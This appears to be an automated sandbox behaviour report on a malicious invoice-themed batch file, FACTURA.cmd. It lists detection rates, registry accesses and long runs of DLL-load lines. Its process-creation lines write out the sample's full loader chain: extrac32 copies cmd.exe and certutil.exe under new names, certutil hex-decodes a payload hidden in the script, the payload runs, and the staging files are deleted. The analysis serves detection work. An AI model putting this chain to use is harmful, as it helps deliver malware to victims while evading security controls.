Windows Analysis Report FACTURA.cmd

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7436:120:WilError_03

Source: C:\Users\Public\Libraries\Host.COM	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales			Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales			Jump to behavior

Source: C:\Windows\System32\extrac32.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: FACTURA.cmd	ReversingLabs: Detection: 33%
Source: FACTURA.cmd	Virustotal: Detection: 34%

Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\FACTURA.cmd" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\extrac32.exe C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
Source: C:\Users\Public\alpha.exe	Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\FACTURA.cmd" "C:\\Users\\Public\\Host.GIF" 3
Source: C:\Users\Public\alpha.exe	Process created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\FACTURA.cmd" "C:\\Users\\Public\\Host.GIF" 3
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Host.GIF" "C:\\Users\\Public\\Libraries\\Host.COM" 10
Source: C:\Users\Public\alpha.exe	Process created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Host.GIF" "C:\\Users\\Public\\Libraries\\Host.COM" 10
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\Libraries\Host.COM C:\Users\Public\Libraries\Host.COM
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\Host.GIF" / A / F / Q / S
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\extrac32.exe C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\FACTURA.cmd" "C:\\Users\\Public\\Host.GIF" 3	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Host.GIF" "C:\\Users\\Public\\Libraries\\Host.COM" 10	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\Libraries\Host.COM C:\Users\Public\Libraries\Host.COM	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\Host.GIF" / A / F / Q / S	Jump to behavior
Source: C:\Users\Public\alpha.exe	Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe	Jump to behavior
Source: C:\Users\Public\alpha.exe	Process created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\FACTURA.cmd" "C:\\Users\\Public\\Host.GIF" 3	Jump to behavior
Source: C:\Users\Public\alpha.exe	Process created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Host.GIF" "C:\\Users\\Public\\Libraries\\Host.COM" 10	Jump to behavior

Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: certcli.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: cryptui.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: ntdsapi.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: certca.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: certcli.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: certca.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: cryptui.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: ntdsapi.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: version.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: url.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
